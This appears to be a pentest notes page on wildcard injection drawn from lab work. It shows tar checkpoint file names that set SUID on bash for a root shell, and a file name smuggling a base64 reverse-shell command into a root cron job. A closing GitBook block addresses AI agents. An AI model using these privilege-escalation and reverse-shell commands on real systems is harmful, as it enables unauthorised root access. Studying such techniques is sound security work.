> For the complete documentation index, see [llms.txt](https://www.davila.me/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.davila.me/menu/vulnerability-methods/wildcard-injection.md). # Wildcard Injection If a command is calling for a wildcard we may be able to inject a command instead. Example of a command that calls for `tar -cf /opt/backups/website.tar *` From OffSec With the cron backup script and our write access to the webroot, we can trick the `tar` command into running arbitrary commands as root using a wildcard injection. This works by using the `--checkpoint` and `--checkpoint-action` flags accepted by `tar`. If we create files in the webroot with names that are arguments for the `tar` command, they will be interpreted as arguments instead of filenames. First, let's move into the webroot and create a file on the target named **exploit.sh** with a simple command to set SUID on **/bin/bash**. ``` exploit.sh echo "chmod +s /bin/bash" > exploit.sh alice@readys:/var/www/html$ ``` We then create two empty files using `touch`. The first will cause `tar` to cause a checkpoint on every file and the second will tell `tar` to execute our **exploit.sh** with `bash` on every checkpoint. ``` alice@readys:/var/www/html$ touch ./"--checkpoint=1" touch ./"--checkpoint=1" alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh" touch ./"--checkpoint-action=exec=bash exploit.sh" ``` After a few minutes, we check if the cron job has run and if SUID is set on **/bin/bash**. ``` alice@readys:/var/www/html$ ls -l /bin/bash ls -l /bin/bash -rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash alice@readys:/var/www/html$ ``` We can now execute `bash` with SUID to gain a root shell on the target. ``` alice@readys:/var/www/html$ /bin/bash -p /bin/bash -p shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory whoami root ``` ## Example 2 ``` /etc/cron.d/wpclean:*/5 * * * * root /usr/bin/find . -type f -not -regex '.*\.\(jpg\|jpegcd /\|png\|gif\)' -exec bash -c "rm -f {}" ``` The command above runs every 5 minutes by root. We want to insert ourselves into the command to get a root reverse shell. I went to the folder in question (wp uploads) and created a file with: ``` touch ./"file.exe; echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40OS4yMjMvODg4OCAwPiYx | base64 -d | bash" ``` I set my listener like normal and once the 5 minutes were done, the command ran and toward the end essentially it ran `rm -f file.exe; echo c2ggLWkgPi....` giving me root on the reverse shell. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.davila.me/menu/vulnerability-methods/wildcard-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.